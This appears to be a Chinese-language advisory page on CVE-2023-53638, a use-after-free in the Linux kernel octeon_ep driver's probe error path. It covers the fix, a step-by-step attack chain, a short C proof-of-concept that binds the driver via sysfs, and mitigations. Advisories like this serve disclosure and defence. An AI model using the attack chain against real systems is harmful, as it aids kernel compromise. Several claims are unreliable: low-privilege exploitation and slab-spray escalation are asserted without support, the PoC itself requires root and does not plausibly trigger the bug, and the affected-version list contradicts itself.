CVE-2023-53638：Linux内核octeon_ep驱动释放后使用漏洞

漏洞信息

漏洞编号

CVE-2023-53638

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（octeon_ep网络驱动）

漏洞概述

CVE-2023-53638是Linux内核中octeon_ep网络设备驱动存在的一个高危释放后使用（Use-After-Free）漏洞。该漏洞位于Linux内核的octeon_ep模块中，具体涉及驱动探测（probe）阶段的错误处理路径。当octep_probe函数在获取设备MAC地址失败时，会直接退出函数，但此时已入队的延迟工作项（delayed work）intr_poll_task并未被取消。当该延迟工作项稍后运行时，由于相关设备结构体已被释放，将触发释放后使用漏洞，可能导致内核崩溃、信息泄露或权限提升。

该漏洞的CVSS 3.1评分为7.8，属于高危级别。攻击者需要本地低权限访问权限，无需用户交互即可利用。漏洞的成功利用可能造成高机密性影响、高完整性影响和高可用性影响。由于octeon_ep驱动用于Marvell Octeon系列网络处理器，该漏洞主要影响使用此类硬件加速器的服务器和嵌入式系统。

此漏洞的修复方案是将intr_poll_task的取消操作从octep_remove函数移至octep_device_cleanup函数中。由于octep_device_cleanup函数在probe错误路径中也会被调用，这样可以确保在probe失败时也能正确取消已入队的工作项，避免释放后使用问题的发生。值得注意的是，ctrl_mbox_task的取消操作必须放在intr_poll_task之后，因为ctrl_mbox_task可能由intr_poll_task入队。

技术细节

该漏洞的技术原理涉及Linux内核中的工作队列（workqueue）机制和驱动生命周期管理。具体分析如下：

1. **漏洞触发条件**：在octeon_ep驱动的probe阶段，当调用获取设备MAC地址的接口失败时，probe函数会跳转到错误处理路径并退出，但未取消已经入队的延迟工作项intr_poll_task。

2. **释放后利用过程**：probe失败后，内核会释放与设备关联的octep_device结构体内存。然而，之前入队的intr_poll_task延迟工作项仍然存在于系统工作队列中。当定时器到期或工作队列调度执行该任务时，intr_poll_task将尝试访问已经被释放的octep_device结构体内容，从而触发use-after-free漏洞。

3. **利用方式**：攻击者可以通过以下方式触发该漏洞：
- 在具有低权限本地访问权限的系统中，触发octeon_ep设备的probe流程；
- 通过某种方式使MAC地址获取操作失败（例如硬件故障模拟或特定配置）；
- 等待延迟工作项执行，此时将访问已释放的内存；
- 通过精心构造的内存布局，攻击者可以在被释放的内存中放置恶意数据，实现代码执行或权限提升。

4. **修复方案**：将cancel_delayed_work_sync(&oct->intr_poll_task)从octep_remove函数移至octep_device_cleanup函数。由于octep_device_cleanup在probe错误路径和remove正常路径中都会被调用，因此可以确保工作项在所有退出路径上都被正确取消。同时，ctrl_mbox_task的取消必须放在intr_poll_task之后执行，因为前者可能被后者入队。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标系统的本地低权限访问权限。由于漏洞的CVSS向量为AV:L（本地攻击向量）和PR:L（低权限要求），攻击者无需管理员权限即可利用此漏洞。

STEP 2

步骤2：触发octeon_ep驱动probe流程

攻击者通过PCI设备热插拔或驱动绑定操作，触发octeon_ep驱动的probe函数执行。可以通过写入/sys/bus/pci/drivers/octeon_ep/new_id或使用类似机制来实现。

STEP 3

步骤3：制造probe失败条件

通过故障注入、硬件配置错误或竞态条件，使octep_probe函数在获取设备MAC地址阶段失败，导致函数提前退出而未取消已入队的延迟工作项intr_poll_task。

STEP 4

步骤4：等待延迟工作项执行

probe失败后，内核释放octep_device结构体内存。但intr_poll_task仍然存在于工作队列中，等待调度执行。攻击者等待该工作项被调度。

STEP 5

步骤5：触发释放后使用

当intr_poll_task延迟工作项运行时，它将访问已被释放的octep_device结构体内存，触发use-after-free漏洞。攻击者可以通过预先控制释放后的内存内容（如通过slab分配器喷射）来实现代码执行或权限提升。

STEP 6

步骤6：权限提升或系统崩溃

成功利用后，攻击者可以在内核上下文中执行任意代码，实现本地权限提升至root权限，或者直接导致系统内核崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53638 - octeon_ep Use-After-Free
// This PoC demonstrates the vulnerability trigger condition
// Note: Requires root or CAP_NET_ADMIN to load/unload kernel modules

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>

// Simulate triggering octeon_ep probe failure
// In a real scenario, this would involve manipulating hardware state
// or using fault injection to cause MAC address retrieval to fail

int trigger_probe_failure(void) {
    // Step 1: Attempt to bind octeon_ep device (requires hardware or VF)
    // In test environment, this requires actual octeon hardware or PCI passthrough
    int fd = open("/sys/bus/pci/drivers/octeon_ep/new_id", O_WRONLY);
    if (fd < 0) {
        perror("Failed to access octeon_ep driver");
        return -1;
    }

    // Step 2: Write a device ID that will cause probe to fail at MAC address retrieval
    // The actual device ID depends on the specific Octeon hardware
    const char *dev_id = "177d:0093";  // Example Octeon device ID
    if (write(fd, dev_id, strlen(dev_id)) < 0) {
        perror("Failed to trigger probe");
        close(fd);
        return -1;
    }

    close(fd);

    // Step 3: Wait for the delayed work to execute on freed memory
    // This will trigger the use-after-free
    printf("Waiting for delayed work to trigger UAF...\n");
    sleep(5);

    return 0;
}

int main(int argc, char *argv[]) {
    printf("CVE-2023-53638 PoC - octeon_ep Use-After-Free\n");
    printf("WARNING: This may crash the kernel!\n");

    if (getuid() != 0) {
        fprintf(stderr, "This PoC requires root privileges\n");
        return 1;
    }

    return trigger_probe_failure();
}

影响范围

Linux Kernel < 6.6（受影响的稳定版本）

Linux Kernel 6.6.x（部分版本）

Linux Kernel 6.7-rc1之前的版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以采取以下临时缓解措施：1）通过将octeon_ep驱动列入黑名单（echo "blacklist octeon_ep" >> /etc/modprobe.d/blacklist.conf）来防止该驱动被加载；2）如果系统不使用Marvell Octeon网络硬件，确认octeon_ep模块未被加载；3）限制本地用户的PCI设备管理权限，避免未授权用户触发设备probe流程；4）启用内核的内存安全加固选项如KASLR、SLAB_FREELIST_HARDENED等，增加利用难度；5）监控系统日志，关注内核oops或panic信息，及时发现可能的利用尝试。